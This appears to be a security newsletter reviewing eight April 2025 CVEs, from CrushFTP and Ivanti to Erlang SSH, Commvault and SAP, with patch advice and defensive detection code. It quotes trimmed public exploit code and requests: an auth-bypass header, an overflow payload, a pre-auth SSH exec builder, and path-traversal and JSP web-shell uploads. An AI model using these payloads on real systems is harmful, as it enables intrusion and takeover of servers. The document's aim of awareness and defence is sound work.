
The Bug Report - April 2025 Edition


Figure 1: Common Vishing Techniques

Why am I here?


Ah, spring. The season of blossoms, allergies, and — apparently — auth bypasses, remote code execution, and buffer overflows is in full bloom.

Welcome to The Bug Report – April 2025 Edition, where we roll up our sleeves, grab our metaphorical mop buckets, and try to scrub some sanity back into our digital lives.

This month, the cybersecurity world is tracking mud through every corner of your infrastructure:

CrushFTP lets attackers stroll in with a forged cookie and admin dreams. Ivanti took “stack overflow” a little too literally, spraying memory like it's pollen.

Erlang SSH servers handed out RCE like Easter eggs. Commvault? It unpacked ZIPs like a curious raccoon unzipping your tent at 3 a.m.

And let’s not forget Apple, whose media parser tried to handle spring break videos and faceplanted into a memory corruption bug.

We’re here because you can’t Marie Kondo your way out of a zero-day. So instead, we’ll walk you through this month’s dirtiest CVEs — complete with PoCs, mitigation advice, and just enough dry humor to get you through the patch window.

So open those windows (firewalled, of course), let in the fresh air, and get ready to sweep out the threats before they settle in. Because spring is for cleaning — not rebuilding your network from backups.

CVE-2025-0618 Trellix Endpoint Security HX, Persistent Denial of Service
CVE-2025-31161 CrushFTP, Authentication Bypass
CVE-2025-22457 Ivanti Connect Secure VPN, Remote Code Execution
CVE-2025-24859 Apache Roller, Session Management
CVE-2025-32433 Erlang OTP SSH, Remote Code Execution
CVE-2025-31200 Apple iOS/iPadOS/tvOS/visionOS/macOS, Memory Corruption
CVE-2025-34028 Commvault Command Center Innovation Release, Path Traversal
CVE-2025-31324 SAP NetWeaver Visual Composer, Unauthorized File Upload

Get your brooms out!



CVE-2025-0618 – Trellix Endpoint Security (HX): When One Dust Bunny Breaks the Vacuum


What is it?


Even in the tidiest homes, the occasional mess comes from within. So let's start with some housekeeping.

CVE-2025-0618 affects Trellix Endpoint Security (HX) Server versions 10.0.2 and earlier, where a specially crafted tamper protection event can trigger a persistent denial-of-service in the HX service itself.

In plain English: one funky event causes HX to choke on an unhandled exception. The result? Tamper protection events will not process further — permanently — even after a reboot. It’s like throwing one broken sock into the dryer and watching it refuse to run ever again.

There’s no active exploitation or public PoC as of writing, but this is the kind of bug that attackers love: a stealthy way to blind security tools before the real intrusion begins.

Your HX breaking down because of one bad event? Time for a spring patch.


Who cares?


Anyone running Trellix HX 10.0.2 or older — especially in environments where endpoint tampering could be part of an attacker’s lateral movement or persistence strategy.

This isn’t a code execution bug. It’s subtler. It breaks one of your core detection lanes and stays broken. A compromised endpoint that can no longer scream when it’s being tampered with? That’s a red team dream.


What can I do?


Patch it like it’s spring: Upgrade to HX Server 10.0.4!

  • How to check? Go to Admin → Appliance Settings and look for your version at the bottom.

Need help? Follow the HX 10.x System Administration Guide on the Trellix Product Docs site.

Bonus tips:

  • Set up alerting for missing HX events, not just received ones
  • Cross-reference with your SIEM to flag silent or non-reporting agents
  • Build a habit of auditing HX behavior after maintenance or alert suppression
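The "alert on missing events" tip above is the one people skip, so here is what it looks like in code. This is an added example, not Trellix code or an HX API: it assumes the SIEM can hand you, per agent, the timestamp of the last tamper-protection event and the last event of any kind (the agent names and timestamps are constructed). The second function captures the CVE-2025-0618 signature specifically, where the lane dies on the server and every live agent goes quiet at once.

```python
from datetime import datetime, timedelta

# Constructed sample data (not real HX telemetry): the most recent tamper-protection event
# and the most recent event of any kind that the SIEM has for each HX agent.
LAST_TAMPER_EVENT = {
    "host-fin-01": datetime(2025, 4, 28, 9, 15),
    "host-fin-02": datetime(2025, 4, 28, 9, 40),
    "host-hr-07": datetime(2025, 4, 20, 17, 5),    # tamper lane quiet for a week
    "host-dev-11": None,                            # enrolled, never sent a tamper event
    "host-ops-03": datetime(2025, 4, 10, 8, 0),     # quiet on every lane: host is offline
}
LAST_ANY_EVENT = {
    "host-fin-01": datetime(2025, 4, 28, 9, 50),
    "host-fin-02": datetime(2025, 4, 28, 9, 55),
    "host-hr-07": datetime(2025, 4, 28, 9, 58),
    "host-dev-11": datetime(2025, 4, 28, 9, 30),
    "host-ops-03": datetime(2025, 4, 10, 8, 5),
}
NOW = datetime(2025, 4, 28, 10, 0)   # constructed "current time" for the sample


def silent_tamper_lane(last_tamper, last_any, now, max_gap):
    """Agents that are demonstrably alive (an event of some kind inside max_gap) but whose
    tamper-protection lane has produced nothing inside the same window.

    A host that is dark on every lane is an availability problem, not this alert, so it is
    skipped. A host that talks on every lane except tamper protection is what a wedged
    tamper-event pipeline (CVE-2025-0618) or a deliberately disabled sensor looks like."""
    findings = []
    for agent, last_any_ts in last_any.items():
        if now - last_any_ts > max_gap:
            continue
        last_tp = last_tamper.get(agent)
        if last_tp is None or now - last_tp > max_gap:
            findings.append(agent)
    return sorted(findings)


def tamper_lane_dead_serverwide(last_tamper, last_any, now, max_gap):
    """CVE-2025-0618 stops tamper-event processing on the HX server, so after the trigger
    every live agent's tamper lane goes quiet together. True when no live agent has a
    recent tamper event, which points at the server rather than at one endpoint."""
    live = [a for a, ts in last_any.items() if now - ts <= max_gap]
    if not live:
        return False
    return all(last_tamper.get(a) is None or now - last_tamper[a] > max_gap for a in live)
```

Run `silent_tamper_lane(..., NOW, timedelta(days=1))` on the sample and you get the two hosts that are alive but silent on the tamper lane; the offline host is left for the availability alert, and the fleet-wide check stays false because two agents are still reporting.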


CVE-2025-31161 – CrushFTP: The AWS Header That Opened Pandora’s Box


What is it?


Think of this as the ultimate identity theft hack—except instead of phishing emails, it’s just an HTTP header and a cookie that look kinda right. CVE-2025-31161 is a critical auth bypass in CrushFTP (10.0.0–10.8.3 and 11.0.0–11.3.0) that lets attackers impersonate any user, including the all-powerful crushadmin.

This all hinges on a flawed interpretation of AWS4-HMAC-SHA256 Authorization headers, where CrushFTP goes: “You look trustworthy enough. Come on in.”

Exploitation has been confirmed.

  • Huntress saw active breaches in 4 organizations as early as March 30.
  • The Shadowserver Foundation honeypots picked it up on March 31.
  • Attackers even patched compromised servers to hide their tracks (Talk about rude houseguests!).
CrushFTP evaluating Authorization headers: ‘Close enough.’


Who cares?


If your business moves files with CrushFTP, especially in sensitive sectors (looking at you: finance, health, gov), you’re on thin ice. A public PoC exists, and it is a single HTTP request:


GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/



🧠 Why this works:

  • The Authorization value triggers a logic flaw that sets anyPass=true
  • The CrushAuth cookie? It’s not even validated, just pattern-matched
  • Boom. You’re crushadmin now. Hope you brought snacks.

What can I do?


Update Immediately

  • 10.x: Upgrade to 10.8.4
  • 11.x: Upgrade to 11.3.1
  • Enable automatic updates

On Windows, rename .jar_tmp files if necessary. Audit for suspicious user accounts (e.g., names that look like long GUIDs, or crushadmin2), for log entries containing AWS4-HMAC-SHA256, for changed config files, and for unrecognized .dll or .jar files.

Proactively, admins may consider disabling the default crushadmin, enforcing MFA, and restricting admin access via IP allowlists.



CVE-2025-22457 – Ivanti: Buffer Overflow in the Fast Lane


What is it?


Ever seen someone squeeze a clown car's worth of digits into a tiny field? That’s what CVE-2025-22457 does. A stack-based buffer overflow in Ivanti Connect Secure (ICS), Policy Secure (IPS) and ZTA gateway appliances lets an unauthenticated attacker send an overlong, numeric X-Forwarded-For header to overwrite stack memory and hijack execution flow.

The kicker? You can only use digits and periods. Yet attackers still brute-forced ASLR and ran remote code like it was Sunday brunch.

Google Threat Intelligence Group attributed exploitation of this vulnerability to a China-nexus APT. Ivanti silently patched it in February (and attackers reverse-engineered it in March).


Who cares?


If you’re still on:

  • ICS < 22.7R2.6
  • IPS < 22.7R1.4
  • ZTA < 22.8R2.2

…it’s open season on your network gateway. 

There’s a publicly available POC by Rapid7’s Stephen Fewer. The exploit brute-forces a 512-entry ASLR pool while heap spraying Ivanti’s memory like it’s a graffiti wall in the 90s.

# Relevant exploit flow (Ruby; trimmed from the Rapid7 module)
require 'socket'

buffer = '1' * 622
buffer += [
  0x31313131, # EBX
  0x32323232, # ESI
  0x33333333, # EDI
  0x34343434, # EBP
  0x35353535, # EIP placeholder (not actually hit here)
  0x39393930  # [ebp+8] -> heap spray trigger address
].pack('V*')  # little-endian 32-bit words; every byte is still a digit, so the filter lets them through

http_request = <<~EOF
  GET / HTTP/1.1
  Host: vulnerable-ivanti.example.com
  X-Forwarded-For: #{buffer}

EOF

# Assumption for this excerpt: a plain TCP socket. The appliance serves HTTPS, so a real run
# wraps this connection in TLS on 443.
sock = TCPSocket.new('vulnerable-ivanti.example.com', 443)
sock.send(http_request.gsub("\n", "\r\n"), 0)



🚧 Where’s the bug?

In the /home/bin/web binary, the server copies the X-Forwarded-For header into a fixed-length char buff50[50] with strlcpy(), but the length argument is derived from the source rather than from the 50-byte destination, so the call's "bound" bounds nothing. Send 622 characters from the allowed set (0123456789.) and the copy spills into adjacent stack memory.

The field is sanitized to accept only characters common to IP addresses. But with some clever ASCII choices and struct layout predictions, that’s just enough to:

  • Overwrite return pointers.
  • Manipulate ctx structure.
  • Control processCookieHeader() logic.

Since Ivanti uses multiple child web processes (based on CPU cores), the PoC opens 1000+ connections, flooding the heap with controlled patterns. Then it brute-forces the base of libdsplibs.so (ASLR has ~9 bits entropy → ~512 guesses).

If successful, a reverse shell connects back to the attacker, or any arbitrary command is executed with root privileges on the appliance.
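Both of the bugs above leave a very recognisable shape in a raw request: for CrushFTP, an AWS4-HMAC-SHA256 Authorization header aimed at the web interface with a Credential= and no Signature=; for Ivanti, an X-Forwarded-For value made only of digits and dots and longer than the 50-byte buffer can hold. The triage below is an added example for the log-audit advice in both sections, not code from Trellix, CrushFTP, Ivanti or Rapid7. The sample requests are constructed (the CrushFTP one reproduces the PoC shape shown earlier; the host names are placeholders), and the 49-character threshold is simply the buffer size minus the terminator.

```python
import re

# Constructed sample requests for this example: the CrushFTP bypass shape shown above, the
# Ivanti X-Forwarded-For overflow shape, and two benign requests for comparison.
CRUSHFTP_POC = (
    "GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1\r\n"
    "Host: files.example.com\r\n"
    "Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111\r\n"
    "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/\r\n\r\n"
)
IVANTI_POC = (
    "GET / HTTP/1.1\r\n"
    "Host: vpn.example.com\r\n"
    "X-Forwarded-For: " + "1" * 622 + "\r\n\r\n"
)
BENIGN_WEB = (
    "GET /WebInterface/function/?command=getUserList&c2f=ab12 HTTP/1.1\r\n"
    "Host: files.example.com\r\n"
    "Cookie: CrushAuth=1743113839553_k4F9bQ2zXm7Lp0Yt3Wd8Rc1Hn6Vab12\r\n"
    "X-Forwarded-For: 203.0.113.7\r\n\r\n"
)
BENIGN_S3 = (
    "PUT /bucket/report.csv HTTP/1.1\r\n"
    "Host: files.example.com\r\n"
    "Authorization: AWS4-HMAC-SHA256 Credential=alice/20250401/us-east-1/s3/aws4_request, "
    "SignedHeaders=host;x-amz-date, Signature=0123abcd\r\n\r\n"
)

ADMIN_NAMES = {"crushadmin"}
AWS4_RE = re.compile(r"AWS4-HMAC-SHA256\s+Credential=([^/\s,]+)/([^,\s]*)")
XFF_CHARSET = re.compile(r"[0-9.]*")
XFF_MAX_SAFE = 49   # char buff50[50] holds 49 characters plus the terminator


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, target, {lower-cased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = [line for line in head.split("\r\n") if line]
    method, target = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def triage(raw):
    """Return a list of findings for one request; an empty list means nothing of note."""
    findings = []
    _, target, headers = parse_request(raw)

    # CrushFTP: an S3-style Authorization header has no business on the web interface,
    # a Credential= with no Signature= is the bypass shape, and crushadmin is the prize.
    auth = headers.get("authorization", "")
    match = AWS4_RE.search(auth)
    if match:
        user = match.group(1)
        if target.startswith("/WebInterface/"):
            findings.append("aws4-auth-on-web-interface")
        if "Signature=" not in auth:
            findings.append("aws4-missing-signature")
        if user in ADMIN_NAMES:
            findings.append("aws4-credential-user:" + user)

    # Ivanti: the vulnerable copy only ever sees digits and dots, so a long header made of
    # nothing else is an overflow attempt, not a misconfigured proxy chain.
    xff = headers.get("x-forwarded-for", "")
    if xff and XFF_CHARSET.fullmatch(xff) and len(xff) > XFF_MAX_SAFE:
        findings.append("xff-oversized:%d" % len(xff))
    return findings
```

The genuine S3 request passes clean because it carries a Signature= and never touches /WebInterface/, which is the distinction that keeps this from paging you on every legitimate S3 client.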

Ivanti's 50-byte buffer when 622 bytes show up: 'More room in here somewhere, right?' 🤡🚗


What can I do?


Patch immediately. Ivanti shipped the Connect Secure fix in February 2025; the Policy Secure and ZTA fixes followed in April.

  • Ivanti Connect Secure: Update to 22.7R2.6 or later (released Feb 11, 2025).
  • Ivanti Policy Secure: Patch to 22.7R1.4 (scheduled for April 21, 2025).
  • Ivanti ZTA Gateways: Update to 22.8R2.2 (scheduled for April 19, 2025).
  • Pulse Connect Secure: End-of-support and not receiving a fix. Migrate to a supported Ivanti platform immediately.

Run Ivanti’s Integrity Checker Tool (ICT) and regularly scan for indicators of compromise. Monitor web server crash logs and suspicious restart events. If your ICT result shows signs of compromise, you should perform a factory reset on the appliance and then put the appliance back into production using version 22.7R2.6.

Pulse Secure has reached End-of-Support. Migration is not optional—mitigating this and future vulnerabilities is mandatory.



CVE-2025-24859 – Apache Roller: The Session That Wouldn’t Die


What is it?


You changed your password. You’re safe, right? Wrong.

CVE-2025-24859 is the session version of a horror movie monster. Apache Roller (pre-6.1.5) lets attackers stay logged in even after a password change, thanks to improper session invalidation. An attacker would need to use an old session to access a vulnerable account.

No complex exploits. No zero-days. Just bad session management hygiene. No active exploitation reported — yet. But if you’re not patching, you’re rolling the dice.

Changing your password, but the attacker’s session still lives: ‘You thought I was gone?’


Who cares?


Apache Roller is used in many organizations for internal or semi-public blogging platforms. If your users reuse passwords, access from untrusted devices, or have anything worth stealing, this is your problem. 

Passive persistence could be an impact of this vulnerability. Once in, attackers stay in until the server goes full amnesia on their session ID. That won't happen until you patch to 6.1.5.


What can I do?


Upgrade Apache Roller: The primary remediation is to upgrade your Apache Roller installation to version 6.1.5 or later. This version contains the fix for the session management vulnerability.
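What "improper session invalidation" means in code, as an added example (not Apache Roller's code, and not how its fix is implemented; a toy session store written for this post): a password change that only rewrites the credential leaves every existing session valid, while the fixed variant bumps a per-user password generation and drops every other session for that user. User names, passwords and the generation counter are all constructed for the example.

```python
import hashlib
import hmac
import os
import secrets


class SessionStore:
    """Toy server-side session model: a session id maps to the user it belongs to plus the
    password 'generation' that was current when the session was minted."""

    def __init__(self):
        self.users = {}      # username -> {"salt", "hash", "gen"}
        self.sessions = {}   # session id -> (username, gen)

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

    def add_user(self, name, password):
        salt = os.urandom(16)
        self.users[name] = {"salt": salt, "hash": self._hash(password, salt), "gen": 0}

    def login(self, name, password):
        user = self.users[name]
        if not hmac.compare_digest(self._hash(password, user["salt"]), user["hash"]):
            return None
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = (name, user["gen"])
        return sid

    def whoami(self, sid):
        """Resolve a session id; a session minted under an older password generation fails."""
        entry = self.sessions.get(sid)
        if entry is None:
            return None
        name, gen = entry
        return name if gen == self.users[name]["gen"] else None

    def change_password_vulnerable(self, name, new_password):
        """The CVE-2025-24859 shape: the credential changes, the sessions do not."""
        user = self.users[name]
        user["salt"] = os.urandom(16)
        user["hash"] = self._hash(new_password, user["salt"])

    def change_password_fixed(self, name, new_password, keep_session=None):
        """Change the credential, then invalidate every other session for the user.
        Bumping the generation covers sessions this node cannot enumerate (another node's
        cache); deleting covers the ones it can."""
        self.change_password_vulnerable(name, new_password)
        user = self.users[name]
        user["gen"] += 1
        for sid in [s for s, (who, _) in self.sessions.items() if who == name]:
            if sid == keep_session:
                self.sessions[sid] = (name, user["gen"])
            else:
                del self.sessions[sid]


def demo():
    """An attacker holds a session obtained earlier (stolen cookie, shared device); the
    user then changes their password. Returns who is still logged in under each variant."""
    out = {}
    store = SessionStore()
    store.add_user("alice", "correct horse")
    attacker = store.login("alice", "correct horse")
    store.change_password_vulnerable("alice", "battery staple")
    out["vulnerable_attacker_still_in"] = store.whoami(attacker) == "alice"

    store = SessionStore()
    store.add_user("alice", "correct horse")
    attacker = store.login("alice", "correct horse")
    victim = store.login("alice", "correct horse")
    store.change_password_fixed("alice", "battery staple", keep_session=victim)
    out["fixed_attacker_still_in"] = store.whoami(attacker) == "alice"
    out["fixed_victim_still_in"] = store.whoami(victim) == "alice"
    out["fixed_new_login_works"] = store.login("alice", "battery staple") is not None
    out["fixed_old_password_rejected"] = store.login("alice", "correct horse") is None
    return out
```

The generation check in whoami() is the part worth copying: it makes "log everyone else out" a property of the credential rather than a loop you hope every code path remembers to run.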



CVE-2025-32433 – Erlang SSH: Execute Me, Maybe?


What is it?


CVE-2025-32433 is what happens when your SSH server throws a backdoor party and forgets to ask for ID. It’s a missing authentication bug in Erlang’s SSH daemon that lets attackers send a CHANNEL_REQUEST with an exec command before authentication completes.

Yes, really.

The existence of a publicly available POC could enable threat actors to start scanning for vulnerable systems and exploiting them.

import socket
import struct
import time

HOST = "127.0.0.1"  # Target IP (change if needed)
PORT = 2222  # Target port (change if needed)

# SSH 'string' type (RFC 4251): uint32 big-endian length followed by the bytes
def string_payload(s):
    if isinstance(s, str):
        s = s.encode()
    return struct.pack(">I", len(s)) + s

# Builds SSH_MSG_CHANNEL_REQUEST with 'exec' payload
def build_channel_request(channel_id=0, command=None):
    if command is None:
        command = 'file:write_file("/lab.txt", <<"pwned">>).'
    return (
        b"\x62"  # SSH_MSG_CHANNEL_REQUEST
        + struct.pack(">I", channel_id)
        + string_payload("exec")
        + b"\x01"  # want_reply = true
        + string_payload(command)
    )

# ... (rest of the POC)



How the PoC works:

  • Sends an SSH banner: Triggers version exchange
  • Crafts a minimal SSH_MSG_KEXINIT: Bypasses full negotiation
  • Sends SSH_MSG_CHANNEL_OPEN for session channel
  • Sends SSH_MSG_CHANNEL_REQUEST with exec:
    • Command: file:write_file("/lab.txt", <<"pwned">>).

Why Erlang executes this:

OTP's SSH connection handler dispatches connection-protocol messages (SSH_MSG_CHANNEL_OPEN, SSH_MSG_CHANNEL_REQUEST) without first checking that user authentication has completed. So a remote attacker sends the exec request before ever authenticating, and the daemon runs it in its own context.

This script just sweet-talks the SSH server into writing a file. Imagine what else it could sweet-talk it into doing! If you value your server's obedience to you, patch this pronto.
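To make the flaw concrete from the server's side, here is an added example (not OTP's code, and a deliberately simplified model of its state machine): a decoder for the SSH_MSG_CHANNEL_REQUEST bytes the PoC sends, a "vulnerable" dispatcher that runs exec requests regardless of connection state, and a "fixed" one that refuses any channel request until SSH_MSG_USERAUTH_SUCCESS has been sent. The message layout follows RFC 4254 §5.4; the `ConnectionState` class and the return strings are constructed for the example.

```python
import struct

SSH_MSG_CHANNEL_REQUEST = 98   # 0x62


def _ssh_string(data):
    """Encode an SSH 'string': uint32 length prefix + bytes."""
    return struct.pack(">I", len(data)) + data


def _read_string(buf, off):
    """Decode an SSH 'string' at offset off; returns (bytes, new offset)."""
    (length,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4: off + 4 + length], off + 4 + length


def build_exec_request(channel_id, command):
    """Same wire format the PoC above produces for an 'exec' channel request."""
    return (bytes([SSH_MSG_CHANNEL_REQUEST]) + struct.pack(">I", channel_id)
            + _ssh_string(b"exec") + b"\x01" + _ssh_string(command.encode()))


def parse_channel_request(msg):
    """Decode SSH_MSG_CHANNEL_REQUEST (RFC 4254 section 5.4) into a dict."""
    if msg[0] != SSH_MSG_CHANNEL_REQUEST:
        raise ValueError("not a CHANNEL_REQUEST")
    (channel,) = struct.unpack_from(">I", msg, 1)
    rtype, off = _read_string(msg, 5)
    want_reply = bool(msg[off])
    off += 1
    req = {"channel": channel, "type": rtype.decode(), "want_reply": want_reply}
    if rtype == b"exec":
        cmd, _ = _read_string(msg, off)
        req["command"] = cmd.decode()
    return req


class ConnectionState:
    """Per-connection state: has userauth finished, and what has been executed."""
    def __init__(self):
        self.authenticated = False
        self.executed = []


def handle_vulnerable(state, msg):
    """Mirrors the flaw: connection-protocol messages are dispatched without consulting
    the authentication state, so a pre-auth exec runs. (The real daemon evaluates the
    Erlang term here; this model only records it.)"""
    req = parse_channel_request(msg)
    if req["type"] == "exec":
        state.executed.append(req["command"])
    return "executed"


def handle_fixed(state, msg):
    """Same dispatcher with the missing gate: no channel traffic before authentication."""
    if not state.authenticated:
        return "disconnect: channel request before authentication"
    return handle_vulnerable(state, msg)
```

The fixed handler is one line, which is the whole story of this CVE: the protocol state machine has a clear "connected" phase, and the dispatcher simply has to refuse connection-layer messages until it is there.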

SSH server when attackers whisper 'exec' before login: ‘Yeah, sure, go right in.’


Who cares?


Anyone using Erlang/OTP in network-exposed environments (think RabbitMQ, distributed Elixir services, etc.) is vulnerable if the host runs an SSH server through OTP's ssh application on:

  • OTP 27.x before 27.3.3
  • OTP 26.x before 26.2.5.11
  • OTP 25.x before 25.3.2.20

The bug lives in the ssh application, so an OTP install that never starts an SSH daemon is not reachable this way; one that does is exposed on whatever port that daemon listens on.

What can I do?


Apply Patches: The most critical remediation step is immediately upgrading Erlang OTP to one of the fixed versions: OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20. These versions contain the necessary security fixes to address the vulnerability. Follow the official Erlang OTP upgrade documentation for your specific environment.

Temporary Workaround (If Patching Cannot Be Immediately Performed):

  • Disable SSH Server: If the SSH service is not essential, consider temporarily disabling it on the affected systems. This will prevent any potential exploitation via the SSH protocol.
  • Implement Firewall Rules: If disabling SSH is not feasible, restrict access to the SSH port (typically TCP port 22) by implementing strict firewall rules. Allow connections only from trusted and necessary IP addresses or networks.


CVE-2025-31200 – Apple OSes: A Byte Too Far


What is it?


This one’s a memory corruption bug buried in Apple’s media processing pipeline. CVE-2025-31200 affects iOS, iPadOS, macOS, tvOS, and visionOS, allowing a maliciously crafted media file to trigger arbitrary code execution.

Imagine watching a video or opening an image, and it launches a payload instead of a Pixar short. You might be exposed if you’ve got autoplay enabled or open media files from emails/messages.

Apple confirmed in-the-wild exploitation— likely in targeted attacks against high-profile individuals.


Who cares?


This affects nearly every modern Apple device, especially those not yet running macOS Sequoia 15.4.1+, iOS/iPadOS 18.4.1+, tvOS 18.4.1+, visionOS 2.4.1+

No PoC has been released publicly, but Apple’s advisory confirms active exploitation in the wild.


What can I do?


Apply Patches: The primary and most critical remediation step is to update your Apple devices to the latest versions where this vulnerability has been addressed. This includes:

  • tvOS 18.4.1 or later for Apple TVs.
  • visionOS 2.4.1 or later for Apple Vision Pro.
  • iOS 18.4.1 and iPadOS 18.4.1 or later for iPhones and iPads.
  • macOS Sequoia 15.4.1 or later for Macs. 

Ensure all eligible devices are promptly updated to these versions to mitigate the risk.



CVE-2025-34028 – Commvault Command Center: ZIP It and Rip It


What is it?


It’s like RCE-by-UPS. CVE-2025-34028 lets attackers send a ZIP file, write it into any directory, and execute malicious code from a public web folder — no auth needed. Just path traversal, Tomcat, and a .jsp shell.


Who cares?


If you’re running Commvault Innovation Release 11.38.0 – 11.38.19, you’re toast! LTS versions are safe (for now).
The awesome folks at watchTowr Labs published a full PoC.

import argparse
import base64
import random
import string
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ... (part of the POC showing the upload request)
parser = argparse.ArgumentParser()
parser.add_argument("url")  # e.g. https://commvault.example.com
parser.add_argument("zip")  # path to the crafted archive; in the original PoC the archive is built in the elided section
args = parser.parse_args()
random_path = "".join(random.choices(string.ascii_lowercase, k=8))
latin1_string = open(args.zip, "rb").read().decode("latin-1")  # ZIP bytes embedded in the text body as latin-1

# The servicePack field is the traversal: it steers the unpack location out of the
# expected directory and into the web-served Reports/MetricsUpload tree.
upload_url = f"{args.url}/commandcenter/deployServiceCommcell.do"
upload_headers = {"Content-Type": "multipart/form-data; boundary=------------------------FmGJxvg3mB7iaQevvO5qVW"}
upload_data = f"--------------------------FmGJxvg3mB7iaQevvO5qVW\r\nContent-Disposition: form-data; name=\"servicePack\"\r\nContent-Type: text/plain\r\n\r\n/../../../Reports/MetricsUpload/{random_path}/\r\n--------------------------FmGJxvg3mB7iaQevvO5qVW\r\nContent-Disposition: form-data; name=\"file\"; filename=\"file.zip\"\r\nContent-Type: application/octet-stream\r\n\r\n{latin1_string}\r\n--------------------------FmGJxvg3mB7iaQevvO5qVW--\r\n"
requests.post(upload_url, headers=upload_headers, data=upload_data, verify=False)

# ... (part of the POC showing the shell execution)
shell_url = f"{args.url}/reports/MetricsUpload/{random_path}/.tmp/dist-cc/dist-cc/shell.jsp"
requests.get(shell_url, verify=False)



They're essentially sliding a malicious ZIP file right under Commvault's nose and then telling it to execute the contents. The PoC unpacks it directly into the Reports web directory, and opens up a shiny new .jsp shell. Zero-click, zero-auth RCE via file upload and traversal. Send a ZIP, get a shell in return. No refunds.
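Two checks would have stopped this: refusing a client-supplied path component that resolves outside the intended directory, and refusing archive entries that climb out of the extraction root (zip-slip). Below is an added example of both, written for this post and not Commvault's code or its fix; the directory names echo the PoC, and the archives are constructed in memory so it runs offline.

```python
import io
import tempfile
import zipfile
from pathlib import Path


def resolve_inside(base, user_part):
    """Join a client-supplied path component onto base and refuse anything that does not
    stay under base once normalised. Absolute input is refused outright rather than
    'fixed', because a client has no legitimate reason to send one."""
    base = Path(base).resolve()
    if user_part.startswith(("/", "\\")) or Path(user_part).is_absolute():
        raise ValueError("absolute path refused: %r" % user_part)
    candidate = (base / user_part).resolve()
    if candidate != base and base not in candidate.parents:
        raise ValueError("path escapes %s: %r" % (base, user_part))
    return candidate


def unzip_safely(zip_bytes, dest):
    """Extract an in-memory archive under dest. Every entry is validated before anything
    is written, so a bad entry late in the archive cannot leave earlier ones behind.
    Symlink entries are refused because they are the other classic escape route."""
    dest = Path(dest).resolve()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        plan = []
        for info in zf.infolist():
            if info.is_dir():
                continue
            if ((info.external_attr >> 16) & 0o170000) == 0o120000:
                raise ValueError("symlink entry refused: %r" % info.filename)
            plan.append((info, resolve_inside(dest, info.filename)))
        written = []
        for info, target in plan:
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target.relative_to(dest).as_posix())
    return written


def make_zip(entries):
    """Build a ZIP in memory from {name: bytes}; names are written verbatim, '..' included."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def demo():
    """Exercise both checks against the shapes the PoC uses; returns a dict of outcomes."""
    out = {}
    with tempfile.TemporaryDirectory() as td:
        base = Path(td) / "Reports" / "MetricsUpload"
        base.mkdir(parents=True)
        out["good_written"] = unzip_safely(make_zip({"report/data.txt": b"ok"}), base / "upload1")
        try:
            unzip_safely(make_zip({"../../shell.jsp": b"<%-- not today --%>"}), base / "upload2")
            out["zip_slip_rejected"] = False
        except ValueError:
            out["zip_slip_rejected"] = True
        try:
            resolve_inside(base, "/../../../Reports/MetricsUpload/x/")   # the PoC's servicePack value
            out["absolute_traversal_rejected"] = False
        except ValueError:
            out["absolute_traversal_rejected"] = True
        try:
            resolve_inside(base, "../../../Reports/MetricsUpload/x/")
            out["relative_traversal_rejected"] = False
        except ValueError:
            out["relative_traversal_rejected"] = True
        out["plain_component_ok"] = resolve_inside(base, "11.38/SP20") == (base / "11.38" / "SP20").resolve()
    return out
```

Note that the containment check runs on the resolved path, not on the string: filtering "../" out of the text is the kind of fix attackers route around with "....//" and URL encoding.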

Special delivery! (Also, please unpack and execute it, thanks.)

What can I do?


If you don't want your Commvault server suddenly moonlighting as a command-and-control center, you know what to do (hint: it involves patching).

Apply Patches Immediately: Upgrade to Commvault Command Center Innovation Release version 11.38.20 or later.

Isolate Affected Systems: If patching isn't immediate, isolate the Commvault Command Center from external network access.



CVE-2025-31324 – SAP NetWeaver Visual Composer: Metadata Mayhem


What is it?


Imagine leaving your back door wide open, and someone walks in to hang a malicious painting on your wall — except the painting is a web shell, and your house is a high-value SAP deployment.

CVE-2025-31324 is a critical unauthorized file upload vulnerability in SAP NetWeaver Visual Composer. The /developmentserver/metadatauploader endpoint fails to enforce authentication or authorization, allowing attackers to upload and execute arbitrary .jsp files — no credentials required.

Multiple PoCs have been made publicly available. One PoC demonstrates a weaponized upload. A raw POST request uploads a malicious cmd.jsp file using multipart form data. The server accepts it blindly:

POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1
Content-Disposition: form-data; name="file"; filename="cmd.jsp"



The body includes Java code that executes system commands passed via the cmd parameter. Once uploaded, the attacker can access it via:


GET /irj/cmd.jsp?cmd=whoami



This GET request is not included in the original PoC but reflects the expected method of payload execution once the shell has been uploaded. The /irj/ path is commonly used in SAP NetWeaver to host user-deployed resources, including malicious JSPs planted this way.

This vulnerability is already being exploited in the wild, with attackers planting persistent backdoors via JSP shells, enabling full system compromise.

Just gonna hang this shell rightttt here.


Who cares?


If you run SAP NetWeaver 7.xx with Visual Composer enabled, this is your mess to clean up. SAP's own non-public guidance says: check the VCFRAMEWORK.SCA component — if it's present, you're vulnerable. If it's not, you might’ve dodged a bullet.

Organizations using SAP for finance, HR, logistics, or government functions could be looking at a full system compromise if this isn’t handled yesterday.


What can I do?


Patch with urgency: Update immediately with SAP Security Note #3594142, which provides hotfix support packages. Also review SAP Notes #3596125 (FAQ),  and #3593336 (workaround options for unpatched systems).

  • Disable Visual Composer if not actively used (SAP Note #3593336 “option 0” workaround)
